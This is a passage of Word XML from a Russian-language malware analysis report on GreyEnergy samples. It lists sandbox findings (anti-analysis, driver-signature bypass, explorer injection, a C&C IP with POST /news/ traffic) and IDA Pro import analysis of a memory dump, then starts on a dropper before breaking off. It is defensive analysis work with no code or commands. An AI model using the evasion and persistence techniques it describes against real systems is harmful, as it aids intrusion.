          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56185D61" w14:textId="64788D2B" w:rsidR="002B236E" w:rsidRDefault="009E61EF" w:rsidP="002B236E">
      <w:r>
        <w:t>После</w:t>
      </w:r>
      <w:r w:rsidRPr="009E61EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>этого</w:t>
      </w:r>
      <w:r w:rsidRPr="009E61EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>файл</w:t>
      </w:r>
      <w:r w:rsidRPr="009E61EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>дампа</w:t>
      </w:r>
      <w:r w:rsidRPr="009E61EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rundll</w:t>
      </w:r>
      <w:r w:rsidRPr="009E61EF">
        <w:t>32.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="009E61EF">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
      <w:r w:rsidRPr="009E61EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>также</w:t>
      </w:r>
      <w:r w:rsidRPr="009E61EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>сначала был проанализирован через виртуальную песочницу. По отчету онлайн песочницы понятно, что в программ</w:t>
      </w:r>
      <w:r w:rsidR="002B236E">
        <w:t>а осуществляет следующие вредоносные действия</w:t>
      </w:r>
      <w:r w:rsidR="002B236E" w:rsidRPr="002B236E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D22FA73" w14:textId="5F50C07C" w:rsidR="002B236E" w:rsidRDefault="002B236E" w:rsidP="002B236E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Анти-анализ и обнаружение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67211415" w14:textId="3ED1FE4B" w:rsidR="002B236E" w:rsidRDefault="002B236E" w:rsidP="002B236E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ProcessHacker.exe - обнаружение инструментов анализа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B27429" w14:textId="0F6E3BDD" w:rsidR="002B236E" w:rsidRDefault="00B15F81" w:rsidP="002B236E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ci.dll – отключение принудительной проверки подписи драйверов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F2981D" w14:textId="4CE64395" w:rsidR="002B236E" w:rsidRDefault="002B236E" w:rsidP="002B236E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Сложные проверки среды - избегание песочниц</w:t>
      </w:r>
      <w:r w:rsidRPr="002B236E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>т.е. в отчете песочницы наверняка указаны не все потенциально опасные действия)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC274DD" w14:textId="77777777" w:rsidR="002B236E" w:rsidRDefault="002B236E" w:rsidP="002B236E">
      <w:r>
        <w:t>2. Техники инъекции и скрытности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1824DB18" w14:textId="418E3D66" w:rsidR="002B236E" w:rsidRPr="002B236E" w:rsidRDefault="002B236E" w:rsidP="002B236E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B236E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="002B236E">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="002B236E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TrayWnd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (класс окна панели задач)</w:t>
      </w:r>
      <w:r w:rsidRPr="002B236E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002B236E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Progman</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (менеджер программ)</w:t>
      </w:r>
      <w:r w:rsidRPr="002B236E">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:t>инъекция</w:t>
      </w:r>
      <w:r w:rsidRPr="002B236E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="002B236E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>проводник</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5C6283" w14:textId="1F9E454B" w:rsidR="002B236E" w:rsidRDefault="002B236E" w:rsidP="002B236E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Использование легитимных процессов (rundll32.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB82FFB" w14:textId="09178F9B" w:rsidR="002B236E" w:rsidRDefault="002B236E" w:rsidP="002B236E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Работа в памяти - минимум следов на диске</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07159E55" w14:textId="77777777" w:rsidR="002B236E" w:rsidRDefault="002B236E" w:rsidP="002B236E">
      <w:r>
        <w:t>3. Сетевое взаимодействие</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AE31B3" w14:textId="7936FDEB" w:rsidR="002B236E" w:rsidRDefault="002B236E" w:rsidP="002B236E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C&amp;C: 217.12.204.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B55873" w14:textId="77777777" w:rsidR="002B236E" w:rsidRDefault="002B236E" w:rsidP="002B236E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Протокол: HTTPS POST запросы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F45294" w14:textId="5CB959EB" w:rsidR="002B236E" w:rsidRPr="002B236E" w:rsidRDefault="002B236E" w:rsidP="002B236E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Путь</w:t>
      </w:r>
      <w:r w:rsidRPr="002B236E">
        <w:t>: /</w:t>
      </w:r>
      <w:r w:rsidRPr="002B236E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>news</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DEA926" w14:textId="4153CDE3" w:rsidR="002B236E" w:rsidRPr="002B236E" w:rsidRDefault="002B236E" w:rsidP="002B236E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Метод</w:t>
      </w:r>
      <w:r w:rsidRPr="002B236E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: POST /news/ HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600BDA50" w14:textId="77777777" w:rsidR="002B236E" w:rsidRDefault="002B236E" w:rsidP="002B236E">
      <w:r>
        <w:t>4. Системное взаимодействие</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76020C01" w14:textId="6214E6AB" w:rsidR="002B236E" w:rsidRDefault="002B236E" w:rsidP="002B236E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>WMI: ROOT\CIMV2, WmiPrvSE.exe - управление системой</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCB7497" w14:textId="37F29339" w:rsidR="002B236E" w:rsidRDefault="002B236E" w:rsidP="002B236E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Сетевые службы: iphlpsvc, mpssvc - работа со службами безопа</w:t>
      </w:r>
      <w:r w:rsidR="00E9452C">
        <w:t>с</w:t>
      </w:r>
      <w:r>
        <w:t>ности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D106B88" w14:textId="7A8EBA36" w:rsidR="002A3261" w:rsidRDefault="00384E68" w:rsidP="002A3261">
      <w:r>
        <w:t xml:space="preserve">Далее файл дампа был открыт для изучения в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDAPro</w:t>
      </w:r>
      <w:r w:rsidRPr="00384E68">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Файл дампа по сути показывает снимок состояния памяти с информацией о запущенных процессах и выполняемых модулях. </w:t>
      </w:r>
      <w:r w:rsidR="002A3261">
        <w:t xml:space="preserve">Каждый процесс или загружаемая </w:t>
      </w:r>
      <w:r w:rsidR="002A3261">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidR="002A3261" w:rsidRPr="002A3261">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="002A3261">
        <w:t xml:space="preserve">библиотека при открытии дампа в </w:t>
      </w:r>
      <w:r w:rsidR="002A3261">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDAPro</w:t>
      </w:r>
      <w:r w:rsidR="002A3261" w:rsidRPr="002A3261">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A3261">
        <w:t>отображаются как отдельные сегменты (см. рисунок 17).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9BD98F" w14:textId="77777777" w:rsidR="002A3261" w:rsidRDefault="002A3261" w:rsidP="002A3261">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00210D66">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="031A1059" wp14:editId="0A490188">
            <wp:extent cx="5182870" cy="35394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5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1340" w14:textId="10E9439E" w:rsidR="002A3261" w:rsidRPr="00345FEC" w:rsidRDefault="002A3261" w:rsidP="002A3261">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002A326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2A326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17</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">.  Сегменты файла </w:t>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rundll</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D19FD0" w14:textId="2214BF3C" w:rsidR="002A3261" w:rsidRPr="002A3261" w:rsidRDefault="002A3261" w:rsidP="002A3261">
      <w:r>
        <w:t xml:space="preserve">В списке секций найдем секцию создаваемого вредоносного файла </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA3AA4">
        <w:t>{D7382DDA-743F-4817-AB47-C495DEDE2C20}</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dbf</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(см. рисунок 17 – выделенный сегмент). При переходе на нее видно, что он представлен как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DATA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (см. рисунок 18). Выделим всю секцию и переведем ее в код (см. рисунок 19). После этого, видно таблицу импортов для сегмента, по которой можно судить о выполняемых им действиях. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712AFBED" w14:textId="77777777" w:rsidR="002A3261" w:rsidRDefault="00210D66" w:rsidP="002A3261">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00210D66">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="187A835F" wp14:editId="6610BCAB">
            <wp:extent cx="5144770" cy="23636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236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084D" w14:textId="18D8D226" w:rsidR="00A8138A" w:rsidRPr="002A3261" w:rsidRDefault="002A3261" w:rsidP="002A3261">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002A326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2A326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18</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Сегмент вредоносного файла в виде байтов данных</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0316EF" w14:textId="77777777" w:rsidR="002A3261" w:rsidRDefault="002A3261" w:rsidP="002A3261">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="00210D66" w:rsidRPr="00210D66">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D433285" wp14:editId="650FED3D">
            <wp:extent cx="5483417" cy="25374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3417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57D9" w14:textId="05F75251" w:rsidR="00210D66" w:rsidRDefault="002A3261" w:rsidP="002A3261">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002A326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2A326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19</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Сегмент вредоносного файла в виде кода</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB5C672" w14:textId="77777777" w:rsidR="002A3261" w:rsidRDefault="002A3261" w:rsidP="002A3261">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47955433" wp14:editId="0EADEF22">
            <wp:extent cx="4725670" cy="30909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30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EA70" w14:textId="5F6A7800" w:rsidR="002A3261" w:rsidRPr="002A3261" w:rsidRDefault="002A3261" w:rsidP="002A3261">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002A326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2A326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20</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002A3261">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Часть таблицы импортов сегмента вредоносного файла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565FAB6D" w14:textId="4D92915B" w:rsidR="00210D66" w:rsidRDefault="000F6783" w:rsidP="000F6783">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">По анализу импортов, можно сделать итоговый вывод, что это модуль для сбора информации и закрепления в системе (автозагрузка). Таким образом, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GreyEnergymini</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6783">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6783">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>представляет из себя сборщик полной информации о компьютере потенциальной жертвы, а также установщик программы – скидывателя бэкдора для основного ВПО с помощью сетевого взаимодействия (но сами методы скачивания и запуска ВПО выполняются не через него).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBAFB53" w14:textId="78D462B1" w:rsidR="006974E8" w:rsidRDefault="006974E8" w:rsidP="00AE77BD">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc214273119"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GreyEnergy</w:t>
      </w:r>
      <w:r w:rsidR="00AE77BD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dropper.bin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="06DB29F3" w14:textId="6DE89CE2" w:rsidR="00AE77BD" w:rsidRDefault="00AE77BD" w:rsidP="00AE77BD">
      <w:r>
        <w:t>Этот</w:t>
      </w:r>
      <w:r w:rsidRPr="004E4318">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>файл</w:t>
      </w:r>
      <w:r w:rsidRPr="004E4318">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>аналогично</w:t>
      </w:r>
      <w:r w:rsidRPr="004E4318">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>файлу</w:t>
      </w:r>
      <w:r w:rsidRPr="004E4318">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GreyEnergyDropper</w:t>
      </w:r>
      <w:r w:rsidRPr="004E4318">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>doc</w:t>
      </w:r>
      <w:r w:rsidRPr="004E4318">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E4318">
        <w:t>является</w:t>
      </w:r>
      <w:r w:rsidR="004E4318" w:rsidRPr="004E4318">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E4318">
        <w:t>дроппером</w:t>
      </w:r>
      <w:r w:rsidR="004E4318" w:rsidRPr="004E4318">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004E4318">
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidR="004E4318" w:rsidRPr="004E4318">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004E4318">
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="004E4318" w:rsidRPr="004E4318">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004E4318">
        <w:t xml:space="preserve">он только загружает другой потенциально вредоносный файл. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD7715B" w14:textId="47BFA2BC" w:rsidR="004E4318" w:rsidRDefault="004E4318" w:rsidP="004E4318">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Для начала снова проанализируем файл в виртуальной песочнице</w:t>
      </w:r>
      <w:r w:rsidRPr="004E4318">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="00B045B5">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>https://hybrid-analysis.com/sample/6c52a5850a57bea43a0a52ff0e2d2179653b97ae5406e884aee63e1cf340f58b/6556888e15e3439b0c04afd2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004E4318">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>По ре</w:t>
      </w:r>
      <w:r w:rsidR="00C95241">
        <w:t>зультату анализа можно сделать следующие выводы</w:t>
      </w:r>
      <w:r w:rsidR="00C95241">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD2E037" w14:textId="5BE7AD6B" w:rsidR="00C95241" w:rsidRDefault="00C95241" w:rsidP="00C95241">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Тип файла – исполняемый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95241">
        <w:t xml:space="preserve">32 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(т.е. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C95241">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95241">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:t>Должен быть с интерфейсом (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GUI</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95241">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00C5168B">
        <w:t>, но при запуске он не обнаружен</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95241">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1426E335" w14:textId="2DAE42DB" w:rsidR="00C95241" w:rsidRDefault="00C95241" w:rsidP="00C95241">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Файл упакован с помощью </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Safeguard</w:t>
      </w:r>
      <w:r w:rsidRPr="00345FEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="00345FEC">
        <w:t xml:space="preserve">1.03 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00345FEC">
